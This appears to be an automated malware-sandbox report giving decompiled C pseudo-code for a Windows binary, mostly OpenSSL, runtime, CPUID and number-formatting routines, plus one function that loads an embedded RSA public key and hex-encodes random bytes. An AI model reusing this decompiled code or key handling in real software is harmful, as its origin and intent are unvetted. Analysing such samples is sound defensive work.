                                                              0x00ba7b36
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b24
                                                              0x00ba7b5a
                                                              0x00ba7b5a
                                                              0x00ba7b5b
                                                              0x00000000
                                                              0x00ba7af0
                                                              0x00ba7af0
                                                              0x00ba7af8
                                                              0x00ba7afc
                                                              0x00ba7afd
                                                              0x00000000
                                                              0x00ba7af0
                                                              0x00ba7ae4
                                                              0x00ba7aca
                                                              0x00000000
                                                              0x00ba7a63
                                                              0x00ba7a77
                                                              0x00ba7a81
                                                              0x00ba7a83
                                                              0x00ba7a83
                                                              0x00ba7a92
                                                              0x00ba7a9a
                                                              0x00ba7bee
                                                              0x00ba7c04
                                                              0x00ba7c04

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,00000000,?,00BA7C89,%s:%d: OpenSSL internal error: %s,?,?,000000B1,00B964AF,assertion failed: EVP_CIPHER_CTX_iv_length(ctx) <= (int)sizeof(ctx->iv),crypto\evp\evp_enc.c,000000B1), ref: 00BA7A4C
                                                              • GetFileType.KERNEL32(00000000,?,?,?,00000000,00000001,?,?,?,?,?,?,?,00000001,00000004,00000000), ref: 00BA7A59
                                                              • _vswprintf_s.LIBCMT ref: 00BA7A77
                                                                • Part of subcall function 00C6C7E0: __vsnprintf_l.LIBCMT ref: 00C6C7F3
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7A9A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7ADC
                                                              • _vswprintf_s.LIBCMT ref: 00BA7B70
                                                              • GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,00000001,?,?,?,?,?,?,?), ref: 00BA7B7E
                                                              • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 00BA7B9B
                                                              • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BA7BC9
                                                              • DeregisterEventSource.ADVAPI32(00000000), ref: 00BA7BD0
                                                              • MessageBoxW.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BA7BE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Event$FileSource_vswprintf_s$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWrite__vsnprintf_l
                                                              • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1577032427-278800372
                                                              • Opcode ID: c2a2d1c7a1ca49b6465e48809094a658364ff60ca1a5b94ca68b91d5335eca18
                                                              • Instruction ID: 5b49c8b872123600a92a8a724c3114f0e21f8552efde0a0e9a25a0e2e9bd9ef6
                                                              • Opcode Fuzzy Hash: c2a2d1c7a1ca49b6465e48809094a658364ff60ca1a5b94ca68b91d5335eca18
                                                              • Instruction Fuzzy Hash: 215136B168C315ABD7209B10CC99FAF73B9EF46701F5084D8FA169B191EF709A44C7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C69C26, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00C69C26(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xcc5970; // 0x851ab4dd
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xcc9640 = _t6;
				 *0xcc963c = _t22;
				 *0xcc9638 = _t25;
				 *0xcc9634 = _t21;
				 *0xcc9630 = _t27;
				 *0xcc962c = _t26;
				 *0xcc9658 = ss;
				 *0xcc964c = cs;
				 *0xcc9628 = ds;
				 *0xcc9624 = es;
				 *0xcc9620 = fs;
				 *0xcc961c = gs;
				asm("pushfd");
				_pop( *0xcc9650);
				 *0xcc9644 =  *_t31;
				 *0xcc9648 = _v0;
				 *0xcc9654 =  &_a4;
				 *0xcc9590 = 0x10001;
				_t11 =  *0xcc9648; // 0x0
				 *0xcc9544 = _t11;
				 *0xcc9538 = 0xc0000409;
				 *0xcc953c = 1;
				_t12 =  *0xcc5970; // 0x851ab4dd
				_v812 = _t12;
				_t13 =  *0xcc5974; // 0x7ae54b22
				_v808 = _t13;
				 *0xcc9588 = IsDebuggerPresent();
				_push(1);
				E00C78CC1(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xcbdab8);
				if( *0xcc9588 == 0) {
					_push(1);
					E00C78CC1(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c26
                                                              0x00c69c2c
                                                              0x00c69c2e
                                                              0x00c69c2e
                                                              0x00c6eb9a
                                                              0x00c6eb9f
                                                              0x00c6eba5
                                                              0x00c6ebab
                                                              0x00c6ebb1
                                                              0x00c6ebb7
                                                              0x00c6ebbd
                                                              0x00c6ebc4
                                                              0x00c6ebcb
                                                              0x00c6ebd2
                                                              0x00c6ebd9
                                                              0x00c6ebe0
                                                              0x00c6ebe7
                                                              0x00c6ebe8
                                                              0x00c6ebf1
                                                              0x00c6ebf9
                                                              0x00c6ec01
                                                              0x00c6ec0c
                                                              0x00c6ec16
                                                              0x00c6ec1b
                                                              0x00c6ec20
                                                              0x00c6ec2a
                                                              0x00c6ec34
                                                              0x00c6ec39
                                                              0x00c6ec3f
                                                              0x00c6ec44
                                                              0x00c6ec50
                                                              0x00c6ec55
                                                              0x00c6ec57
                                                              0x00c6ec5f
                                                              0x00c6ec6a
                                                              0x00c6ec77
                                                              0x00c6ec79
                                                              0x00c6ec7b
                                                              0x00c6ec80
                                                              0x00c6ec94

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 00C6EC4A
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C6EC5F
                                                              • UnhandledExceptionFilter.KERNEL32(00CBDAB8), ref: 00C6EC6A
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00C6EC86
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00C6EC8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID: "Kz
                                                              • API String ID: 2579439406-1965083730
                                                              • Opcode ID: f6a46bf52e25244790b8a234d372410ca0c20d823fa7ce35a70eb082c0544453
                                                              • Instruction ID: 627b26f11f8a06686cbd62f9bcd1b5f7e556a7fb62d3e84cb59b271d58894092
                                                              • Opcode Fuzzy Hash: f6a46bf52e25244790b8a234d372410ca0c20d823fa7ce35a70eb082c0544453
                                                              • Instruction Fuzzy Hash: 8521BEB4802204DFC791DF69F98DB8C3BA4FB08324F60419AF509877A1E7B49986CF09
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B91000(void* __ecx) {
				void* __edi;
				void* __esi;
				char* _t13;
				void* _t19;
				unsigned int _t20;
				void* _t22;
				intOrPtr _t23;
				char _t25;
				void* _t27;
				void _t28;
				signed int _t30;
				int _t33;
				char* _t35;
				void _t37;
				void* _t38;
				void* _t40;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t52;

				_t44 = E00C69D40(__ecx, _t52, 0x21, 1);
				_t13 = "-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n";
				_t48 = _t47 + 8;
				 *((intOrPtr*)(_t48 + 0x14)) = _t12;
				_t35 =  &(_t13[1]);
				do {
					_t25 =  *_t13;
					_t13 =  &(_t13[1]);
					_t53 = _t25;
				} while (_t25 != 0);
				E00B979C0("-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n", _t13 - _t35, _t44);
				_t23 = E00C69D40(_t25, _t53, 0x41, 1);
				_t49 = _t48 + 0x14;
				 *((char*)(_t49 + 0x10)) = 0;
				 *((short*)(_t49 + 0x11)) = 0;
				_t46 = 0;
				while(1) {
					E00C69C35(_t38, _t44, _t49 + 0x14, "%02x",  *(_t44 + _t46) & 0x000000ff);
					_t19 = _t49 + 0x1c;
					_t50 = _t49 + 0xc;
					_t27 = _t19;
					do {
						_t37 =  *_t19;
						_t19 = _t19 + 1;
					} while (_t37 != 0);
					_t20 = _t19 - _t27;
					_t45 = _t27;
					_t40 = _t23 - 1;
					do {
						_t28 =  *(_t40 + 1);
						_t40 = _t40 + 1;
					} while (_t28 != 0);
					_t30 = _t20 >> 2;
					_t33 = memcpy(_t40, _t45, _t30 << 2) & 0x00000003;
					_t46 = _t46 + 1;
					_t22 = memcpy(_t45 + _t30 + _t30, _t45, _t33);
					_t49 = _t50 + 0x18;
					_t38 = _t45 + _t33 + _t33;
					if(_t46 < 0x20) {
						_t44 =  *((intOrPtr*)(_t49 + 0x14));
						continue;
					}
					 *((char*)(_t23 + 0x20)) = 0;
					 *0xeca9a8 = _t23;
					return _t22;
				}
			}


























                                                              0x00b91010
                                                              0x00b91012
                                                              0x00b91017
                                                              0x00b9101a
                                                              0x00b9101e
                                                              0x00b91021
                                                              0x00b91021
                                                              0x00b91023
                                                              0x00b91024
                                                              0x00b91024
                                                              0x00b91031
                                                              0x00b9103f
                                                              0x00b91043
                                                              0x00b91046
                                                              0x00b9104b
                                                              0x00b91050
                                                              0x00b91058
                                                              0x00b91067
                                                              0x00b9106c
                                                              0x00b91070
                                                              0x00b91073
                                                              0x00b91075
                                                              0x00b91075
                                                              0x00b91077
                                                              0x00b91078
                                                              0x00b9107e
                                                              0x00b91080
                                                              0x00b91082
                                                              0x00b91083
                                                              0x00b91083
                                                              0x00b91086
                                                              0x00b91087
                                                              0x00b9108d
                                                              0x00b91094
                                                              0x00b91097
                                                              0x00b9109b
                                                              0x00b9109b
                                                              0x00b9109b
                                                              0x00b9109d
                                                              0x00b91054
                                                              0x00000000
                                                              0x00b91054
                                                              0x00b910a1
                                                              0x00b910a6
                                                              0x00b910b0
                                                              0x00b910b0

                                                              APIs
                                                              Strings
                                                              • %02x, xrefs: 00B91061
                                                              • -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU, xrefs: 00B91012, 00B9102B, 00B9102C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _calloc$__calloc_impl_sprintf
                                                              • String ID: %02x$-----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU
                                                              • API String ID: 2194232006-3898999373
                                                              • Opcode ID: 6416fe112413a74399c2b387d0bcac20713bf5737988ccd0c591cca9e3dab1e8
                                                              • Instruction ID: 487c5ecd2aa5dc62442994833136a2adbc822c0c493a915849723a86cb985f46
                                                              • Opcode Fuzzy Hash: 6416fe112413a74399c2b387d0bcac20713bf5737988ccd0c591cca9e3dab1e8
                                                              • Instruction Fuzzy Hash: E9115B215083862BDF20DF385C96BB77BC5DB81700F0445BDF8869B241EAB3998C93E2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3680, Relevance: 7.6, Strings: 6, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 22%
                                                              			E00BA3680(intOrPtr _a8) {
				signed int _t20;
				signed int _t22;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				signed int _t30;
				unsigned int _t39;
				signed char _t44;
				signed int _t45;
				signed int _t50;
				signed int _t53;
				signed int _t58;
				void* _t65;
				signed int _t68;
				signed int _t70;

				_t50 = 0;
				asm("pushfd");
				_pop(_t20);
				_push(_t20 ^ 0x00200000);
				asm("popfd");
				asm("pushfd");
				_pop(_t22);
				_t44 = _t20 ^ _t22;
				asm("bt ecx, 0x15");
				if(0 >= 0) {
					return 0;
				}
				 *(_a8 + 8) = 0;
				asm("cpuid");
				_t25 = 0 | _t39 != 0x756e6547;
				_t26 = _t25 & 0xffffff00 | 0 != 0x49656e69;
				_t27 = _t26 & 0xffffff00 | _t44 != 0x6c65746e;
				_t68 = _t25 | _t26 | _t27;
				if(_t68 == 0 || (_t27 & 0xffffff00 | _t39 != 0x68747541 | (_t27 & 0xffffff00 | _t39 != 0x68747541) & 0xffffff00 | 0 != 0x69746e65 | ((_t27 & 0xffffff00 | _t39 != 0x68747541) & 0xffffff00 | 0 != 0x69746e65) & 0xffffff00 | _t44 != 0x444d4163) != 0) {
					L8:
					__eflags = 0 - 7;
					if(0 >= 7) {
						__eflags = 0;
						asm("cpuid");
						 *(_a8 + 8) = _t39;
					}
					__eflags = 0 - 4;
					_t53 = 0xffffffff;
					if(0 >= 4) {
						asm("cpuid");
						_t53 = 0xbad;
						__eflags = 0xbad;
					}
					_t28 = 1;
					_t45 = 0;
					asm("cpuid");
					_t50 = _t50 & 0xbfefffff;
					__eflags = _t68;
					if(__eflags == 0) {
						_t50 = _t50 | 0x40000000;
						_t28 = 1;
						__eflags = 1 - 0xf;
						if(1 == 0xf) {
							_t50 = _t50 | 0x00100000;
							__eflags = _t50;
						}
					}
					asm("bt edx, 0x1c");
					if(__eflags < 0) {
						_t50 = _t50 & 0xefffffff;
						__eflags = _t53;
						if(_t53 != 0) {
							_t50 = _t50 | 0x10000000;
							__eflags = _t39 >> 0x10 - 1;
							if(_t39 >> 0x10 <= 1) {
								_t50 = _t50 & 0xefffffff;
								__eflags = _t50;
							}
						}
					}
					goto L19;
				} else {
					asm("cpuid");
					if(0x80000000 < 0x80000001) {
						goto L8;
					}
					asm("cpuid");
					_t68 = (_t68 | _t44) & 0x00000801;
					if(0x80000000 < 0x80000008) {
						goto L8;
					} else {
						asm("cpuid");
						_t65 = (_t44 & 0x000000ff) + 1;
						_t28 = 1;
						_t45 = 0;
						asm("cpuid");
						asm("bt edx, 0x1c");
						if(0 < 0 && (_t39 >> 0x00000010 & 0x000000ff) <= _t65) {
							_t50 = 0;
						}
						L19:
						_t58 = _t50;
						_t70 = _t68 & 0x00000800 | _t45 & 0xfffff7ff;
						asm("bt ecx, 0x1b");
						if(_t70 >= 0) {
							L23:
							_t70 = _t70 & 0xefffe7ff;
							 *(_a8 + 8) =  *(_a8 + 8) & 0xffffffdf;
							L24:
							return _t58;
						}
						asm("xgetbv");
						_t30 = _t28 & 0x00000006;
						if(_t30 == 6) {
							goto L24;
						}
						if(_t30 != 2) {
							_t70 = _t70 & 0xfdfffffd;
							_t58 = _t58 & 0xfeffffff;
						}
						goto L23;
					}
				}
			}


















                                                              0x00ba3684
                                                              0x00ba3686
                                                              0x00ba3687
                                                              0x00ba368f
                                                              0x00ba3690
                                                              0x00ba3691
                                                              0x00ba3692
                                                              0x00ba3693
                                                              0x00ba3697
                                                              0x00ba369b
                                                              0x00ba385a
                                                              0x00ba385a
                                                              0x00ba36a5
                                                              0x00ba36a8
                                                              0x00ba36b4
                                                              0x00ba36bf
                                                              0x00ba36ca
                                                              0x00ba36cd
                                                              0x00ba36cf
                                                              0x00ba3765
                                                              0x00ba3765
                                                              0x00ba3768
                                                              0x00ba3777
                                                              0x00ba3779
                                                              0x00ba377b
                                                              0x00ba377b
                                                              0x00ba377e
                                                              0x00ba3781
                                                              0x00ba3786
                                                              0x00ba3796
                                                              0x00ba379d
                                                              0x00ba379d
                                                              0x00ba379d
                                                              0x00ba37a3
                                                              0x00ba37a8
                                                              0x00ba37aa
                                                              0x00ba37ac
                                                              0x00ba37b2
                                                              0x00ba37b5
                                                              0x00ba37bb
                                                              0x00ba37c1
                                                              0x00ba37c4
                                                              0x00ba37c7
                                                              0x00ba37cd
                                                              0x00ba37cd
                                                              0x00ba37cd
                                                              0x00ba37c7
                                                              0x00ba37d3
                                                              0x00ba37d7
                                                              0x00ba37dd
                                                              0x00ba37e3
                                                              0x00ba37e6
                                                              0x00ba37ec
                                                              0x00ba37f5
                                                              0x00ba37f8
                                                              0x00ba37fe
                                                              0x00ba37fe
                                                              0x00ba37fe
                                                              0x00ba37f8
                                                              0x00ba37e6
                                                              0x00000000
                                                              0x00ba36fc
                                                              0x00ba3701
                                                              0x00ba3708
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3715
                                                              0x00ba3719
                                                              0x00ba3725
                                                              0x00000000
                                                              0x00ba372b
                                                              0x00ba3730
                                                              0x00ba3735
                                                              0x00ba3736
                                                              0x00ba373b
                                                              0x00ba373d
                                                              0x00ba373f
                                                              0x00ba3743
                                                              0x00ba375a
                                                              0x00ba375a
                                                              0x00ba3804
                                                              0x00ba3810
                                                              0x00ba3812
                                                              0x00ba3814
                                                              0x00ba3818
                                                              0x00ba3844
                                                              0x00ba3844
                                                              0x00ba384e
                                                              0x00ba3852
                                                              0x00000000
                                                              0x00ba3854
                                                              0x00ba3820
                                                              0x00ba3823
                                                              0x00ba3829
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3832
                                                              0x00ba3838
                                                              0x00ba383e
                                                              0x00ba383e
                                                              0x00000000
                                                              0x00ba3832
                                                              0x00ba3725

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                              • API String ID: 0-1714976780
                                                              • Opcode ID: 0267287f670431e7a6d0a9e082e982835e0205c0dfa79dfcdf529b1d0aab54d9
                                                              • Instruction ID: 5d90352bcb4e9e4779b14dfaf1a295652d2f1025917426a8aaaacfb7240995d7
                                                              • Opcode Fuzzy Hash: 0267287f670431e7a6d0a9e082e982835e0205c0dfa79dfcdf529b1d0aab54d9
                                                              • Instruction Fuzzy Hash: FF313ABBA586120BFB789C3C884536D60C39392B30F2AC7B9F527C36D0E878CE815251
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA8340, Relevance: 4.3, Strings: 3, Instructions: 590COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00BA8340(intOrPtr __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t208;
				signed char _t210;
				signed int _t215;
				signed char _t216;
				signed int _t217;
				signed char _t218;
				signed int _t225;
				signed int _t230;
				signed int _t231;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t252;
				signed int _t253;
				signed int _t256;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t271;
				signed char _t284;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t287;
				intOrPtr _t288;
				signed int _t290;
				signed int _t293;
				signed int _t294;
				signed int _t300;
				signed char _t301;
				signed int _t311;
				signed int _t321;
				signed int _t327;
				signed int _t329;
				intOrPtr _t332;
				signed int _t333;
				signed int _t334;
				intOrPtr _t336;
				signed char _t337;
				intOrPtr _t338;
				intOrPtr _t344;
				signed int _t346;
				intOrPtr _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				intOrPtr _t353;
				intOrPtr* _t354;
				intOrPtr _t355;
				signed int _t361;
				intOrPtr _t362;
				signed int _t366;
				signed int _t370;
				signed int _t373;
				signed int _t394;
				signed long long _t395;
				signed long long _t397;
				signed long long _t399;
				signed long long _t404;
				signed int _t405;

				E00C6BB10(0x70);
				_t208 =  *0xcc5970; // 0x851ab4dd
				 *(_t373 + 0x6c) = _t208 ^ _t373;
				_t210 =  *(_t373 + 0x78);
				_t284 =  *(_t373 + 0x78);
				_t366 =  *(_t373 + 0x90);
				_t346 =  *(_t373 + 0x9c);
				 *(_t373 + 0x1c) = __edx;
				_t319 = 0;
				 *(_t373 + 0x14) = _t210;
				 *((intOrPtr*)(_t373 + 0x18)) = __ecx;
				 *(_t373 + 0x2c) = 0;
				 *(_t373 + 0x24) = 0;
				 *(_t373 + 0x28) = 0;
				 *(_t373 + 0x20) = 0;
				 *(_t373 + 0x3c) = 0;
				if(_t366 < 0) {
					_t366 = 6;
				}
				asm("fldz");
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t210 & 0x00000005) != 0) {
					_t210 =  *(_t373 + 0x9c);
					__eflags = _t210 & 0x00000002;
					if((_t210 & 0x00000002) == 0) {
						__eflags = _t210 & 0x00000004;
						if((_t210 & 0x00000004) != 0) {
							 *(_t373 + 0x2c) = 0x20;
						}
					} else {
						 *(_t373 + 0x2c) = 0x2b;
					}
				} else {
					 *(_t373 + 0x2c) = 0x2d;
				}
				asm("fld1");
				if(_t346 != 2) {
					_t290 = _t346;
					 *(_t373 + 0x30) = _t290;
					__eflags = _t346;
					if(_t346 == 0) {
						goto L44;
					} else {
						goto L21;
					}
				} else {
					asm("fucomp st3");
					asm("fnstsw ax");
					if((_t210 & 0x00000044) != 0) {
						_t404 =  *0xc81cf0;
						asm("fcomp st0, st3");
						asm("fnstsw ax");
						__eflags = _t210 & 0x00000041;
						if((_t210 & 0x00000041) != 0) {
							__eflags = _t366;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									asm("fxch st0, st2");
									goto L37;
								} else {
									st2 = _t404;
									st0 = _t404;
									st1 = _t404;
									st0 = _t404;
									_t210 = E00BA7DC0(_t366);
									_t405 =  *(_t373 + 0x90);
									_t373 = _t373 + 4;
									asm("fcom st0, st1");
									asm("fnstsw ax");
									st1 = _t405;
									asm("fldz");
									asm("fld1");
									asm("fxch st0, st2");
									asm("fxch st0, st3");
									__eflags = _t210 & 0x00000001;
									if((_t210 & 0x00000001) != 0) {
										L37:
										_t290 = 0;
									} else {
										goto L18;
									}
								}
							} else {
								asm("fxch st0, st2");
								asm("fcom st0, st1");
								asm("fnstsw ax");
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									L18:
									_t290 = 1;
								} else {
									_t290 = 0;
								}
							}
							asm("fxch st0, st2");
						} else {
							_t290 = 1;
						}
					} else {
						_t290 = 0;
					}
					 *(_t373 + 0x30) = _t290;
					L21:
					_t395 = st4;
					asm("fucomp st4");
					asm("fnstsw ax");
					if((_t210 & 0x00000044) == 0) {
						asm("fxch st0, st3");
						asm("fcom st0, st1");
						asm("fnstsw ax");
						if((_t210 & 0x00000005) == 0) {
							do {
								asm("fxch st0, st3");
								_t319 = _t319 - 1;
								_t395 = _t395 * st2;
								asm("fcom st0, st1");
								asm("fnstsw ax");
								asm("fxch st0, st3");
							} while ((_t210 & 0x00000005) != 0);
							 *(_t373 + 0x3c) = _t319;
						}
						asm("fxch st0, st3");
						asm("fcom st0, st2");
						asm("fnstsw ax");
						if((_t210 & 0x00000041) == 0) {
							do {
								_t395 = _t395 / st2;
								_t319 = _t319 + 1;
								asm("fcom st0, st2");
